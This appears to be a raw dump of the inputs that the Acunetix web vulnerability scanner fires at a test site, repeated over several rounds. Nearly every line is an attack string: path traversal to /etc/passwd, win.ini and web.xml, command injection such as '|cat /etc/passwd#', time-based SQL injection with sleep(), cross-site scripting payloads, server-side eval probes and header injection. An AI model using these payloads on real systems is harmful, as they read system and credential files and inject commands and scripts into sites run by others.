http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n983425=v927577

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

acu1549\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1549

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1some_inexistent_file_with_long_name%00.jpg

1

1

acux10533\xc0\xbez1\xc0\xbcz2a\x90bcxuca10533

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1<ScRiPt >prompt(959095)</ScRiPt>

1

testasp.vulnweb.com

1

1<script>prompt(962168)</script>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

)

1

1<ScRiPt >prompt(929780)</ScRiPt>

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

!(()&&!|*|*|

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

"|"ld

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?965160></ScRiPt>

-1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

^(#$!@#$)(()))******

WEB-INF/web.xml

1<ScRiPt >prompt(908631)</ScRiPt>

-1)

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<video><source onerror="javascript:prompt(948295)">

WEB-INF\web.xml

'

1

-1))

1

/etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(971330)"></g></svg>

1

1

eFW16Lhx'

1

'"()

1

1<div style=width:expression(prompt(915951))>

1

1

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

NDmKGiuT')

1

1

1<iframe src='data:text/html

1

YNInuJz6'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

'

1<body onload=prompt(920721)>

&dir

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1)

"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(994312)>

1

-1))

'&dir&'

1

1

acunetix_wvs_invalid_filename

1<img src=xyz OnErRor=prompt(945589)>

${@print(md5(acunetix_wvs_security_test))}

http://hitIjKWvdGbJh.bxss.me/

qcZ2GMAm'

"&dir&"

1

1

1

zwHoKhtU')

${@print(md5(acunetix_wvs_security_test))}\

1<img/src=">" onerror=alert(989152)>

file:///etc/passwd

|dir

1

1

comments

jvNCsDfs'))

1<ScRiPt%20>prompt(991332)</sCripT>

1

1

1

1

'|dir

comments

1

/\../\../\../\../\../\../\../etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1&lt

comments/.

1

"|dir

1

http://www.acunetix.tst

1

\xf6<img acu onmouseover=prompt(982349) //\xf6>

1

WEB-INF/web.xml

1

1

1

1

1'"()&%<ScRiPt >prompt(990376)</ScRiPt>

'"

1<input autofocus onfocus=prompt(930753)>

1

1

WEB-INF\web.xml

1

1

'"()&%<ScRiPt >prompt(994575)</ScRiPt>

<!--

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1_908089

1

response.write(9244512*9703581)

../../../../../../../../../../windows/win.ini

1_bTzVn <ScRiPt >prompt(956764)</ScRiPt>

1

1

1

../../../../../../../../../../boot.ini

1

'+response.write(9244512*9703581)+'

1

1

1

"+response.write(9244512*9703581)+"

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

&cat /etc/passwd&

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

................windowswin.ini

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

${99187+100167}

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

acu8923\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8923

|cat /etc/passwd#

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

acux9084\xc0\xbez1\xc0\xbcz2a\x90bcxuca9084

1some_inexistent_file_with_long_name%00.jpg

1

1&n989773=v934249

1

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt >prompt(931062)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

/etc/passwd

WEB-INF/web.xml

1<script>prompt(966970)</script>

testasp.vulnweb.com

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

)

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

WEB-INF\web.xml

'

1

!(()&&!|*|*|

'"()

1<ScRiPt >prompt(942747)</ScRiPt>

1

^(#$!@#$)(()))******

1

1

-1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978471></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

1

1

1

-1)

1

1<ScRiPt >prompt(952618)</ScRiPt>

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

-1))

1

1<video><source onerror="javascript:prompt(980217)">

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

YBO0yQ3V'

&dir

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(920408)"></g></svg>

'

1

file:///etc/passwd

http://hit0kALnKbVjd.bxss.me/

1

bMtuU1Z5')

1

'&dir&'

1

"

1<div style=width:expression(prompt(993214))>

1

acunetix_wvs_invalid_filename

1

1

/\../\../\../\../\../\../\../etc/passwd

c6uFdyoE'))

"&dir&"

${@print(md5(acunetix_wvs_security_test))}

comments

1<iframe src='data:text/html

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

|dir

WEB-INF/web.xml

${@print(md5(acunetix_wvs_security_test))}\

http://www.acunetix.tst

-1

comments

1<body onload=prompt(967543)>

1

'"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946601)>

comments/.

WEB-INF\web.xml

-1)

1'"()&%<ScRiPt >prompt(902007)</ScRiPt>

1

'|dir

<!--

-1))

1<img src=xyz OnErRor=prompt(981848)>

1

1

'"()&%<ScRiPt >prompt(966522)</ScRiPt>

pdbH1WiS'

1

../../../../../../../../../../windows/win.ini

1

1

"|dir

1_939901

1

1<img/src=">" onerror=alert(932666)>

59bC67QQ')

1

1

1

1

1<ScRiPt%20>prompt(981433)</sCripT>

STJQ5a3y'))

1

1

../../../../../../../../../../boot.ini

1

response.write(9943298*9796308)

1&lt

1

1

1

1

1

'+response.write(9943298*9796308)+'

\xf6<img acu onmouseover=prompt(955134) //\xf6>

../../../../../../../../../../windows/win.ini.jpg

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1<input autofocus onfocus=prompt(936953)>

"+response.write(9943298*9796308)+"

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'&cat /etc/passwd&'

<a href='http://www.acunetix.com'>website security</a>

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

[url=http://www.acunetix.com]website security[/url]

................windowswin.ini

1

1

"&cat /etc/passwd&"

1

1_V4b2j <ScRiPt >prompt(994896)</ScRiPt>

1

1

../../../../../../../../../../etc/passwd

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

cat /etc/passwd

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

`cat /etc/passwd`

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../../../../../../../../../../etc/passwd.jpg

${100166+99678}

1

|cat /etc/passwd#

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

acu7045\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7045

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1&n930290=v982957

acux2589\xc0\xbez1\xc0\xbcz2a\x90bcxuca2589

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt >prompt(967002)</ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

testasp.vulnweb.com

1

1<script>prompt(961984)</script>

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1<ScRiPt >prompt(965186)</ScRiPt>

WEB-INF/web.xml

1

1

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900776></ScRiPt>

1

1

'

1

WEB-INF\web.xml

!(()&&!|*|*|

1<ScRiPt >prompt(996839)</ScRiPt>

1

/etc/passwd

^(#$!@#$)(()))******

1

1<video><source onerror="javascript:prompt(969375)">

1

1

1

1

1

"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(970354)"></g></svg>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'"()

||cat /etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<div style=width:expression(prompt(990370))>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

&dir

-1

1<iframe src='data:text/html

1

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1

'

-1)

1<body onload=prompt(949050)>

1

1

1

"&dir&"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952385)>

-1))

"

1

|dir

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

${@print(md5(acunetix_wvs_security_test))}

file:///etc/passwd

BO0Erry3'

1<img src=xyz OnErRor=prompt(956574)>

1

1

1

'|dir

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

/\../\../\../\../\../\../\../etc/passwd

1<img/src=">" onerror=alert(900131)>

FoZ8kzKe')

1

1

comments

"|dir

1

http://hitvLBFFFNgg7.bxss.me/

1

comments

WEB-INF/web.xml

EELo1vyJ'))

1<ScRiPt%20>prompt(995569)</sCripT>

1

1

1

1

1

comments/.

WEB-INF\web.xml

1&lt

-1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

1

\xf6<img acu onmouseover=prompt(984835) //\xf6>

-1)

http://www.acunetix.tst

../../../../../../../../../../windows/win.ini

1

1

1

1

-1))

1<input autofocus onfocus=prompt(970019)>

1

response.write(9772192*9578786)

../../../../../../../../../../boot.ini

'"

1'"()&%<ScRiPt >prompt(983768)</ScRiPt>

<a href='http://www.acunetix.com'>website security</a>

1

hQBlI1qm'

1

'+response.write(9772192*9578786)+'

../../../../../../../../../../windows/win.ini.jpg

<!--

1

'"()&%<ScRiPt >prompt(951445)</ScRiPt>

1

[url=http://www.acunetix.com]website security[/url]

"+response.write(9772192*9578786)+"

SQpFfnZb')

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1_986290

1_oG0dd <ScRiPt >prompt(978946)</ScRiPt>

1

sbE4dKIT'))

1

1

1

1

1

1

&cat /etc/passwd&

1

................windowswin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

${100372+100322}

cat /etc/passwd

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

`cat /etc/passwd`

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1&n922180=v956553

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

1

1

1

1

'|'ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

WEB-INF/web.xml

1

1

"|"ld

)

1

/etc/passwd

!(()&&!|*|*|

1

1

^(#$!@#$)(()))******

WEB-INF\web.xml

1

1

1

acu4404\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4404

1

acux8965\xc0\xbez1\xc0\xbcz2a\x90bcxuca8965

'"()

'

1

1<ScRiPt >prompt(932733)</ScRiPt>

1

1

1

1

1<script>prompt(926063)</script>

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<ScRiPt >prompt(945155)</ScRiPt>

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

||cat /etc/passwd

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?920211></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

1

&dir

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<ScRiPt >prompt(910038)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

1<video><source onerror="javascript:prompt(936645)">

1

'&dir&'

${@print(md5(acunetix_wvs_security_test))}\

1

-1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947908)"></g></svg>

1

acunetix_wvs_invalid_filename

1

1

"&dir&"

1

-1)

file:///etc/passwd

1<div style=width:expression(prompt(953858))>

http://hitcsZlkwjP1N.bxss.me/

1

comments

1

1

1<iframe src='data:text/html

|dir

/\../\../\../\../\../\../\../etc/passwd

1

-1))

1

1<body onload=prompt(948558)>

1

1

comments

1

'|dir

b10pJrYk'

1

WEB-INF/web.xml

comments/.

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(984344)>

1

1

1

1<img src=xyz OnErRor=prompt(905104)>

"|dir

1

Q9EZRNKe')

1

1

1

1

WEB-INF\web.xml

1<img/src=">" onerror=alert(952469)>

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

DZbZrUzJ'))

../../../../../../../../../../windows/win.ini

1

1<ScRiPt%20>prompt(984804)</sCripT>

1

'"

1

-1

1

1

1'"()&%<ScRiPt >prompt(909567)</ScRiPt>

1

1&lt

../../../../../../../../../../boot.ini

'"()&%<ScRiPt >prompt(962497)</ScRiPt>

1

1

1

-1)

response.write(9866174*9886691)

\xf6<img acu onmouseover=prompt(937865) //\xf6>

<!--

1

1_919091

../../../../../../../../../../windows/win.ini.jpg

-1))

1

'+response.write(9866174*9886691)+'

1

1<input autofocus onfocus=prompt(981979)>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

mEILdrHq'

1

1

<a href='http://www.acunetix.com'>website security</a>

1

"+response.write(9866174*9886691)+"

1

................windowswin.ini

1

JtQjoU1n')

&cat /etc/passwd&

1

1

[url=http://www.acunetix.com]website security[/url]

..\..\..\..\..\..\..\..\windows\win.ini

hvdcA0CM'))

SomeCustomInjectedHeader:injected_by_wvs

1

1

1_C66A3 <ScRiPt >prompt(933085)</ScRiPt>

1

'&cat /etc/passwd&'

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

WEB-INF/web.xml

|cat /etc/passwd#

1

acu10377\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10377

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

acux8111\xc0\xbez1\xc0\xbcz2a\x90bcxuca8111

${100229+99940}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

WEB-INF\web.xml

1some_inexistent_file_with_long_name%00.jpg

1

1

1<ScRiPt >prompt(923734)</ScRiPt>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1&n900922=v955960

"|"ld

1

1<script>prompt(929874)</script>

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

1

1<ScRiPt >prompt(974519)</ScRiPt>

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?953073></ScRiPt>

'

1

1

1

1<ScRiPt >prompt(903152)</ScRiPt>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"

/etc/passwd

!(()&&!|*|*|

1

1

1<video><source onerror="javascript:prompt(917591)">

^(#$!@#$)(()))******

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

||cat /etc/passwd

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(955735)"></g></svg>

-1

&dir

1

1

-1)

1<div style=width:expression(prompt(986298))>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'&dir&'

1

1<iframe src='data:text/html

-1))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

"&dir&"

VU116FNU'

1

'"()

1<body onload=prompt(921038)>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(940679)>

1

1

1

mIA575Hb')

1

1<img src=xyz OnErRor=prompt(978599)>

'

|dir

1

109xqR4r'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1<img/src=">" onerror=alert(930694)>

1

1

1

'|dir

-1

1<ScRiPt%20>prompt(987963)</sCripT>

${@print(md5(acunetix_wvs_security_test))}

file:///etc/passwd

1

1

acunetix_wvs_invalid_filename

1

-1)

http://hitdJeiVhMdd1.bxss.me/

"|dir

1&lt

${@print(md5(acunetix_wvs_security_test))}\

/\../\../\../\../\../\../\../etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1))

1

1

\xf6<img acu onmouseover=prompt(967022) //\xf6>

1

1

1

comments

http://www.acunetix.tst

WEB-INF/web.xml

pcA3U60f'

1<input autofocus onfocus=prompt(980144)>

1

comments/.

'"

1

1'"()&%<ScRiPt >prompt(930061)</ScRiPt>

WEB-INF\web.xml

1

<a href='http://www.acunetix.com'>website security</a>

IV2hCV3V')

1

<!--

1

yGxiS9EB'))

[url=http://www.acunetix.com]website security[/url]

'"()&%<ScRiPt >prompt(918796)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1_979801

1

1_R2Krn <ScRiPt >prompt(970964)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1

response.write(9229061*9952729)

1

1

1

1

'+response.write(9229061*9952729)+'

1

1

../../../../../../../../../../windows/win.ini.jpg

&cat /etc/passwd&

"+response.write(9229061*9952729)+"

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

'&cat /etc/passwd&'

1

1

1

1

1

................windowswin.ini

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

1

${99170+99327}

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n931996=v912778

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

1

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

WEB-INF/web.xml

1

acu6039\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6039

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

acux5567\xc0\xbez1\xc0\xbcz2a\x90bcxuca5567

WEB-INF\web.xml

1

'

1

1

)

1<ScRiPt >prompt(941013)</ScRiPt>

1

1

/etc/passwd

1

!(()&&!|*|*|

"

1

1

1

1<script>prompt(943462)</script>

1

^(#$!@#$)(()))******

'"()

1<ScRiPt >prompt(984275)</ScRiPt>

1

||cat /etc/passwd

1

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?930718></ScRiPt>

1

1

&dir

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<ScRiPt >prompt(977984)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

'&dir&'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<video><source onerror="javascript:prompt(904620)">

1

'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1)

"&dir&"

1

http://hit56eBAVotOz.bxss.me/

acunetix_wvs_invalid_filename

"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981462)"></g></svg>

1

1

1

-1))

|dir

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}

1<div style=width:expression(prompt(924512))>

comments

file:///etc/passwd

9Vno1tt0'

1

'|dir

${@print(md5(acunetix_wvs_security_test))}\

1

http://www.acunetix.tst

1<iframe src='data:text/html

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

1

'"

DpX9L9ez')

1

1<body onload=prompt(918035)>

1'"()&%<ScRiPt >prompt(942036)</ScRiPt>

"|dir

WEB-INF/web.xml

1

<!--

y0e1Ir2J'))

1

'"()&%<ScRiPt >prompt(928159)</ScRiPt>

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948742)>

1

-1

1

1

1

1

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(920474)>

1

1

1

1_975434

-1)

1

1<img/src=">" onerror=alert(940183)>

1

response.write(9664116*9551674)

../../../../../../../../../../windows/win.ini

1

1

1

-1))

1<ScRiPt%20>prompt(932280)</sCripT>

&cat /etc/passwd&

1

'+response.write(9664116*9551674)+'

../../../../../../../../../../boot.ini

pRs9vnDJ'

1

1&lt

'&cat /etc/passwd&'

LU1vwhQE')

"+response.write(9664116*9551674)+"

1

../../../../../../../../../../windows/win.ini.jpg

5Ib8R8wd'))

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

\xf6<img acu onmouseover=prompt(953658) //\xf6>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<input autofocus onfocus=prompt(973944)>

SomeCustomInjectedHeader:injected_by_wvs

1

................windowswin.ini

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

<a href='http://www.acunetix.com'>website security</a>

../../../../../../../../../../etc/passwd

